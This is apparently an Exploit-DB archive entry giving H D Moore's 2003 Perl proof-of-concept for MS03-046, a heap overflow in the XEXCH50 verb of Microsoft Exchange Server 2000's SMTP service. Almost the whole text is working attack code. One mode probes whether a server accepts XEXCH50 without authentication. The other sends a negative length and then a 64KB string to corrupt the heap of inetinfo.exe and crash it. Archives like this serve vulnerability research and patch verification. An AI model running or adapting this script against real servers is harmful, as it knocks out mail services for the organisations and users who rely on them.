Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)

EDB-ID:

113


Author:

H D Moore

Type:

dos


Platform:

Windows

Date:

2003-10-22


#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm metasploit com
# This vulnerability allows a remote unauthenticated user to overwrite big chunks 
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is 
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be 
# just about any size, the actual code that crashes varies widely with each request. 
# During the analysis process, numerous combinations of request size, concurrent 
# requests, pre-allocations, and alternate trigger routes were examined and not a 
# single duplicate of location and data offset was discovered. Hopefully the magic 
# combination of data, size, and setup will be found to allow this bug to be reliably 
# exploited.

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

# Command-line handling: <host> is required (usage() exits when it is
# missing), the mode defaults to CHECK, and the SMTP port is fixed at 25.
# $host and $port stay file-scoped because check() and crash() read them.
my $host = shift(@ARGV) || usage();
my $mode = shift(@ARGV) || "CHECK";
my $port = 25;

# Mode name (compared case-insensitively) -> handler. Each handler calls
# exit() itself, so only an unrecognised mode reaches the usage() call below.
my %handler_for = (
    CHECK => \&check,
    CRASH => \&crash,
);

my $handler = $handler_for{ uc($mode) };
$handler->() if $handler;

usage();


# Report whether the SMTP service at $host:$port (file-scoped globals) accepts
# the XEXCH50 verb without prior authentication. Every path exits with
# status 0, so the result is only visible in the printed message; it is not
# usable as a process exit code by a wrapper script.
sub check {
    my $conn = SMTP($host, $port);
    unless ($conn) {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # Well-formed probe with small size arguments; only the reply is needed.
    print {$conn} "XEXCH50 2 2\r\n";
    my $reply = <$conn>;
    close($conn);

    # A patched server refuses XEXCH50 until NTLM authentication has taken
    # place, so a 354 continuation here means the fix is absent. If the peer
    # dropped the connection $reply is undef (warns under -w) and the match
    # fails, which lands in the "patched" branch.
    if ($reply =~ /354 Send binary/i) {
        print "[*] This system is vulnerable: $host:$port\n";
    }
    else {
        print "[*] This server has been patched or is not vulnerable.\n";
    }

    exit(0);
}


# Trigger the MS03-046 condition against $host:$port (file-scoped globals).
# Every exit path uses status 0, so the outcome is only reported through the
# printed messages. Left as written: the order and timing of the writes and
# the trailing reconnect are what the observed behaviour depends on.
sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    # $res is undef if the peer closes the connection here; under -w the
    # match below then warns ("uninitialized value") but still takes the
    # "patched" branch.
    my $res = <$s>;    

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] Sending massive heap-smashing string...\n";
    # 65536 bytes (16384 x "META"). The handle is never closed explicitly; it
    # is presumably released when $s is reassigned below.
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    # The replacement handle is discarded at exit; a failed reconnect (undef,
    # or an SMTP() banner mismatch) is not reported here.
    $s = SMTP($host, $port);

    exit(0);
}


# Print the command-line synopsis to STDERR and terminate. Exits with status
# 0, matching every other exit path in this script.
sub usage {
    my $prog = $0;
    print STDERR "Usage: $prog <host> [CHECK|CRASH]\n";
    exit(0);
}

# Open a TCP connection to $host:$port, require a greeting banner that
# mentions "Microsoft", then step through HELO / MAIL FROM / RCPT TO, reading
# one reply line after each command. Reply codes are not inspected; only an
# empty read (peer closed the connection) aborts. Returns the connected
# IO::Socket::INET handle, or undef on connect failure, banner mismatch or a
# dropped connection. No connect or read timeout is set, so a silent peer
# blocks the caller indefinitely.
sub SMTP {
    my ($host, $port) = @_;

    my $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
    );
    return undef unless $sock;

    my $banner = <$sock>;
    return undef unless $banner;

    unless ($banner =~ /Microsoft/) {
        chomp($banner);
        print STDERR "[*] This does not look like an exchange server: $banner\n";
        return undef;
    }

    # Minimal envelope so the server will accept a subsequent data verb.
    for my $cmd ("HELO X", "MAIL FROM: DoS", "RCPT TO: Administrator") {
        print {$sock} "$cmd\r\n";
        my $reply = <$sock>;
        return undef unless $reply;
    }

    return $sock;
}


# milw0rm.com [2003-10-22]